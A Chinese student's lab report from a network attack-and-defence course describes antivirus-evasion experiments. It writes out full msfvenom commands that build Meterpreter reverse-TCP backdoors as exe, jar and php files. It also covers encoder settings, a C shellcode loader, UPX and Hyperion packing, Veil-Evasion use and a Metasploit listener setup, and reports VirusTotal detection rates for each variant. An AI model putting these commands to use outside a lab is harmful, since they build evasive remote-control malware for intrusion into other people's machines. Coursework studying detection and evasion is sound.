20232423 2025-2026-1 《网络与系统攻防技术》实验三实验报告

20232423 2025-2026-1 《网络与系统攻防技术》实验三实验报告

目录

• 一、实验内容
• 二、实验要求
• 三、实验环境
• 四、学习内容
• 五、实验过程
  • 5.1 查看msfvenom支持的输出、编码格式和形成免杀效果参考基准
  • 5.2 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
    • 5.2.1 生成exe文件和编码的exe文件
    • 5.2.2 生成jar文件和编码的jar文件
    • 5.2.3 生成php文件和编码的php文件
  • 5.3 使用veil免杀工具
    • 5.3.1 veil免杀工具的下载
    • 5.3.2 veil使用过程
  • 5.4 使用C + shellcode编程
  • 5.5 使用加壳工具
    • 5.5.1 使用压缩壳UPX
    • 5.5.2 使用加密壳Hyperion
  • 5.6 通过组合应用各种技术实现恶意代码免杀
    • 5.6.1 使用msfvenom工具
    • 5.6.2 使用压缩壳UPX
    • 5.6.3 使用加密壳Hyperion
    • 5.6.4 检测免杀效果
  • 5.7 开启杀软回连实测
• 六、问题及解决
• 七、学习感悟

---

一、实验内容

(1) 正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

• 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
• veil，加壳工具
• 使用C + shellcode编程

(2) 通过组合应用各种技术实现恶意代码免杀

如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。

(3) 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

---

二、实验要求

回答问题：

（1）杀软是如何检测出恶意代码的？

1. 特征码检测：通过识别恶意软件的特定特征串判断是否为病毒；
2. 启发式检测：基于程序行为、代码结构等特征，推测程序是否具有恶意；
3. 文件校验和：计算文件校验和，与已知恶意软件校验和比对，识别恶意文件；
4. 行为检测：监控程序运行过程中的行为，如异常文件操作、网络连接等，判断是否为恶意软件；
5. 云查杀：将文件信息上传至云端，结合云端海量恶意软件数据库进行检测；
6. 人工智能/机器学习：通过训练模型，让系统自主学习恶意软件特征，实现智能检测；
7. 沙箱技术：在一个虚拟的隔离环境中运行可疑程序，观察其所有实际行为，从而识破伪装。

（2）免杀是做什么？

  免杀就是通过修改恶意软件的特征和行为，使其能够绕过杀毒软件的检测，避免被查杀。

  核心的目的是为了让恶意软件逃避检测，成功入侵并长期潜伏。可以理解为恶意软件为了“隐身”而进行的伪装。

（3）免杀的基本方法有哪些？

1. 修改特征码：定位识别恶意软件的特征串（≤64字节），修改无关紧要的特征内容（如删除或替换“灰鸽子上线成功！”等标识性语句），规避特征码检测。
2. 修改校验和：修改特征码时，需同步重新计算并修改文件校验和，需破解分析校验和计算方法，确保文件校验值正常。
3. 花指令免杀：插入无意义的垃圾指令，不影响程序执行结果，但会改变程序部分偏移量，若杀软无法识别花指令，其特征码检测偏移量错位，无法正常检测。
4. 加壳免杀：用特殊算法压缩或加密EXE、ELF、DLL文件资源，加壳文件可独立运行，解压/解密在内存完成。

  壳的类型：

• 加密壳：如ASPacK、UPX、PECompact，侧重文件加密。
• 压缩壳：如ASProtect、Armadillo、EXECryptor，侧重文件压缩。
• 虚拟机保护技术：将x86汇编可执行代码转换为字节码（伪指令），封装原有指令，防止逆向与修改，工具如Themida、VMProtect。

5. 内存免杀：杀软文件扫描与内存扫描特征码不同，在内存中对后门程序采用修改特征码、加壳等免杀技术，避免内存扫描时被检测删除。

---

三、实验环境

  虚拟机VMware中Kali的linux环境（50G的硬盘）

---

四、学习内容

本周学习内容

（1）简单后门实践

  Veil Evasion是Linux平台免杀工具，专注于生成 msf 的 payload（搭配meterpreter），绕过杀毒软件检测

  用Netcat搭建简单后门，适合快速测试小范围设备。Meterpreter搭配Veil Evasion，则是为了生成能绕过杀软的“隐蔽后门”。

（2）免杀与实践

1. 免杀定义：通过对恶意软件处理，使其不被杀毒软件检测，是渗透测试核心技术之一。
2. 杀毒软件原理

  特征码检测、启发式检测、行为检测、文件校验和、云查杀、机器学习

3. 免杀技术

  修改特征码、修改校验和、花指令免杀、加壳免杀（加密壳、压缩壳）、内存免杀

---

五、实验过程

5.1 查看msfvenom支持的输出、编码格式和形成免杀效果参考基准

  因为后续我们要使用msfvenom生成如jar之类的其他文件，所以先来看看msfvenom支持的所有输出格式，输入命令msfvenom --list formats进行查看，如下图

可以看到msfvenom支持的输出格式有exe和jar，这两种类型的文件是我们后续要生成的文件。（！这个是后续php文件的一个分析要点）
然后我们来看看msfvenom支持的所有编码方式，输入命令msfvenom --list encoders，如下图

可以清晰地看到msfvenom有PHP编码器；
虽然列表中没有直接命名为“exe”的编码器，但msfvenom的编码器通常不直接绑定到输出格式，而是作用于payload内容本身，例如x86/shikata_ga_nai（excellent）、x64/xor（normal）、cmd/powershell_base64（excellent），这些编码器可以用于对Windows exe格式的shellcode进行编码，只要payload是x86/x64架构的。因此exe格式的payload是可以被编码的。
列表中没有专门针对jar的编码器，但可以使用通用编码器对嵌入在 JAR 中的shellcode进行编码。jar本身没有专用编码器，但其中的payload是可以被编码的。
接下来形成免杀效果参考基准。
为了能看出在后续使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧生成的文件的免杀效果，我们先使用msfvenom直接生成一个后门程序，以其检出率作为免杀效果参考基准。
使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.208.128 PORT=2423 -f exe > 20232423.exe生成一个Windows下的后门程序，当这个程序在目标计算机上运行时，它会主动连接回攻击者（IP: 192.168.208.128，端口: 2423），从而为攻击者提供一个远程控制通道。如下图

将该文件从kali虚机中直接拖出到主机中来，然后放入virustotal（VirusTotal - Home）进行评价，评价结果如下图，检出率为50/71，将这个比例作为参照，查看后续的免杀技术效果。

5.2 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件

5.2.1 生成exe文件和编码的exe文件

  利用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.208.128 LPORT=2423 -f exe > met-encoded20232423.exe生成一个经过编码的Windows后门程序，当在目标机器上运行时，会建立到192.168.208.128:2423的Meterpreter会话
其中“-e x86/shikata_ga_nai”是制定编码方式为多态编码，"shikata_ga_nai"著名的多态编码
“-b '\x00'”表示排除空字节（\x00）
如下图

将生成的文件拿去检测，可以得到检出率为42/70，检出率有所下降。
可能原因是x86/shikata_ga_nai编码器通过多态变换、指令重组和垃圾代码插入等方式，改变了文件的二进制特征序列，破坏了原有的静态特征匹配模式，使得有部分内容出现无法检测出的情况。

再利用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.208.128 LPORT=2423 -f exe > met-10encoded20232423.exe在之前的基础上进行了10次编码。
“-i 10”表示对payload进行10次编码，每次迭代都会重新编码，增加复杂性和免杀效果
如下图

得到检出率为44/72，跟没编码前的差不多，与甚至略有回升，说明对于exe文件来说单纯增加编码次数并不能有效提升免杀效果。

5.2.2 生成jar文件和编码的jar文件

  使用命令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.208.128 LPORT=2423 -f jar>metjar20232423.jar生成一个java格式的Meterpreter反向TCP payload
其中“x>”可以利用输出文件后缀名隐式指定文件类型，这里也可以使用“-f jar”，如下图。

然后使用命令msfvenom -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.208.128 LPORT=2423 x>met-10encoded-jar20232423.jar生成一份编码10次的jar文件
如下图

这两个文件得到的检出率均为35/64，相比于exe文件，jar文件的免杀效果在一定程度上有所提高。
可能的原因是java环境在企业环境中相对较少，导致安全厂商对java恶意软件的检测投入相对较少；或者java的跨平台特性使得其恶意软件特征不如Windows原生程序那样被广泛研究和记录

5.2.3 生成php文件和编码的php文件

  现在要生成一个PHP格式的Meterpreter反向连接后门。
按照msfvenom的常规命令格式我们可以考虑使用命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.208.128 LPORT=2423 -f php> metphp_20232423.php，结果发现报错，如下图

可以看到报错信息为“php是invalid的”，同时还列出了我们在5.1看到的msfvenom支持的输出格式（其中是不支持php的）
前面说到“x>”可以利用输出文件后缀名隐式指定文件类型。
所以我们使用命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.208.128 LPORT=2423 x> metphp_20232423.php来生成PHP格式的文件，如下图，成功生成

该文件得到的检出率为25/62，检出率有明显下降

然后使用命令msfvenom -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192168.208.128 LPORT=2423 x> met_10encoded_php_20232423.php生成一份编码10次的php文件。该文件得到的检出率为9/62，如下图，检出率大幅减少

说明php文件难以被识别，且php的编码有不错的免杀效果。php文件难以被识别的原因好像是因为msfvenom不支持输出php所以生成的php文件就是乱码，被10次编码后那更是乱码中的乱码，所以难以被识别。

5.3 使用veil免杀工具

5.3.1 veil免杀工具的下载

  因为veil所需内存较大，而我的虚机硬盘大小只有20G，为了能顺利下载，我将硬盘空间进行了扩充（扩充到50G），扩充教程（kali扩展内存 - 知乎）然后下载veil。
使用命令sudo apt -y install veil

再使用指令usr/share/veil/config/setup.sh --force --silent,用veil自带的shell脚本配置好环境。好的，我在这里失败了（解决方法详见后续问题及解决方法）

在问题解决之后，这个过程涉及到很多内容，例如依赖包安装（安装Python库、编译工具、Wine等）、工具配置等。在下载中途还会捆绑下载python等内容，所需时间较长，耐心等待一下。
下载完成后在命令行中输入veil就会出现以下界面

5.3.2 veil使用过程

  上一张图中，可以看到Evasion（躲避模块）是第一个选项，输入use 1进入Evasion模块

输入list查看所有可用的载荷种类，如下图

看到c/meterpreter/rev_tcp.py是第7个选项，输入use 7。这是使用Veil-Evasion工具，选择其C语言载荷模板，来生成一个具有免杀功能的、使用C语言编写的、能够建立反向TCP连接的Meterpreter载荷。如下图

“.py”文件本身是Veil-Evasion的生成器脚本，它包含了创建最终恶意软件的源代码模板和逻辑。当运行这个脚本时，它会向你询问必要的参数，攻击者的IP地址LHOST和端口号LPORT（这些是我们要填写的内容），然后将这些参数填充到预设的C语言源代码模板中。
所以现在输入以下信息进行配置
set LHOST 192.168.208.128（攻击者的ip，用于反弹连接）
set LPORT 2423(设置连接端口)
generate(开始生成)
payload20232423（生成文件的文件名）

根据下文提示的路径，在“/var/lib/veil/output/compiled”目录下找到生成的可执行文件，如下图

该文件的检出率为39/71，有一定的免杀效果。

5.4 使用C + shellcode编程

  使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.208.128 LPORT=2423 -f c生成一个适用于Windows系统的、反向TCP连接的Meterpreter载荷，该载荷的二进制代码将以C语言数组的形式输出，它的主要作用是自定义加载器。
这个命令生成的C代码本身不能直接运行。它需要被一个加载器来执行，所以我们通过vim编辑器，为上述生成的载荷增添一个main函数，如下图

int main(){ 
int (*func)() = (int(*)())buf; 
func();}

然后使用命令i686-w64-mingw32-g++ shellcode_20232423.c -o shellcode_20232423.exe在Linux系统上，使用Mingw交叉编译工具链，将一个名为shellcode_20232423.c的C源代码文件编译成一个名为shellcode_20232423.exe的32位Windows可执行程序，即创建一个用于Windows平台的载荷执行程序，如下图

该文件的检出率是38/71，有一定的免杀效果

5.5 使用加壳工具

5.5.1 使用压缩壳UPX

  使用指令upx shellcode_20232423.exe -o shellcode_upx_20232423.exe对“shellcode_20232423.exe”文件进行压缩。
upx压缩工具的核心是减小可执行文件的体积、改变文件特征，从而可能增强其免杀能力，并且保持功能完整。如下图

该文件的检出率是40/72，反而比压缩之前上升了，说明这个壳的特征已经被很广泛的记录。

5.5.2 使用加密壳Hyperion

  使用命令
cp shellcode_20232423.exe /usr/share/windows-resources/hyperion/将目标文件复制到Hyperion的工作目录
cd /usr/share/windows-resources/hyperion切换到Hyperion的主目录，为后续执行命令做准备
wine hyperion.exe -v shellcode_20232423.exe shellcode_hyp_20232423.exe使用Wine在Linux下运行Windows程序Hyperion，对文件进行加密加壳


如下图，加密文件已生成

该解密文件的检出率为53/73,反而比没加密之前的上升了，说明这个壳的特征已经被很广泛的记录——Hyperion是一类公开的加密壳工具，由于其加壳后的文件可能具有某些可识别的特征，或者其行为已被安全厂商广泛记录，所以免杀效果不理想。

5.6 通过组合应用各种技术实现恶意代码免杀

5.6.1 使用msfvenom工具

  使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.208.128 LPORT=2423 -f c > 20232423_shellcode.c生成一个经过多态编码（-e x86/shikata_ga_nai）、多次迭代编码（-i 10）的Meterpreter反向TCP载荷，该载荷避免了空字符（“-b '\x00'”），并最终以C语言数组的形式保存到文件中
使用vim工具在生成的文件中加入main函数，如下图

int main(){ 
int (*func)() = (int(*)())buf; 
func();}

使用命令i686-w64-mingw32-g++ 20232423_shellcode.c -o 20232423_shellcode.exe将包含恶意Shellcode的C语言通过交叉编译工具加载器程序编译成一个Windows可执行文件，如下图

5.6.2 使用压缩壳UPX

  使用命令upx 20232423_shellcode.exe -o 20232423_shellcode_upx.exe为可执行文件加上UPX压缩壳

5.6.3 使用加密壳Hyperion

  使用命令wine hyperion.exe -v 20232423_shellcode_upx.exe 20232423_shellcode_upx_hyp.exe为可执行文件加上Hyperion加密壳。
因为在执行之前的步骤时，都是在Hyperion的工作目录下，所以省去了像之前将文件挪入Hyperion工作目录和进入Hyperion工作目录的步骤。
如下图

5.6.4 检测免杀效果

  对最后文件20232423_shellcode_upx_hyp.exe进行检测该文件的检出率为50/71，很高的检出率，免杀效果不理想。

然后将最终生成的带有压缩壳和加密壳的exe文件放入杀软中（迈克菲）进行扫描，很可惜，杀软发现了，并把我的文件粉碎了。

5.7 开启杀软回连实测

  在kali中输入msfconsole打开msf的控制台，输入以下命令，开启监听
use exploit/multi/handler（使用Metasploit的多功能监听器模块）
set payload windows/meterpreter/reverse_tcp（设置载荷类型）
set LHOST 192.168.208.128（攻击者ip地址，即虚机ip地址）
set LPORT 2423（监听的端口）
exploit（启动监听服务）
在杀软开启的情况下，在主机上运行生成的可执行文件，可以看到回连失败，被杀软拦截

杀毒软件为迈克菲，信息如下

---

六、问题及解决

问题：veil下载失败，在运行/usr/share/veil/config/setup.sh --force --silent出现以下报错，Git克隆失败、Wine组件安装失败、依赖文件缺失（setup-dependencies目录不存在）、python相关问题等

解决方法：
使用命令/usr/share/veil/config/setup.sh --force，然后在下载过程中会捆绑下载python，那么上诉的python相关问题就解决了；
依赖文件手动下载

# 创建依赖目录
sudo mkdir -p /var/lib/veil/setup-dependencies
sudo chown $USER:$USER /var/lib/veil/setup-dependencies# 手动克隆依赖仓库
cd /var/lib/veil/setup-dependencies
git clone https://github.com/Veil-Framework/VeilDependencies.git .

  之后再次运行/usr/share/veil/config/setup.sh --force，虽然还会有报错，但是好像不影响后续进程？
总之这个方法比较赖皮，仅供参考

---

七、学习感悟

  这次实验不太顺利啊，那个veil下载不下来浪费了我好多时间。
这次实验让我对恶意代码的生成、免杀技术以及杀毒软件的检测机制有了更深入的理解。
在实践过程中，我不仅掌握msfvenom、veil等工具的基本使用方法，还尝试了通过编码、加壳、自定义shellcode加载等方式来绕过杀软检测。
尽管最终生成的载荷在真实环境中仍被我的杀软（迈克菲）拦截，但整个过程中遇到的挑战和解决问题的经历，让我认识到免杀并非一蹴而就，而是需要不断调试、组合多种技术，并让我深入理解了杀软对行为特征的动态对抗过程。
这次实验不仅锻炼了我的动手能力，也让我从学长学姐的免杀成功和我免杀失败的案例中体会到网络安全领域中“道高一尺，魔高一丈”的持续博弈。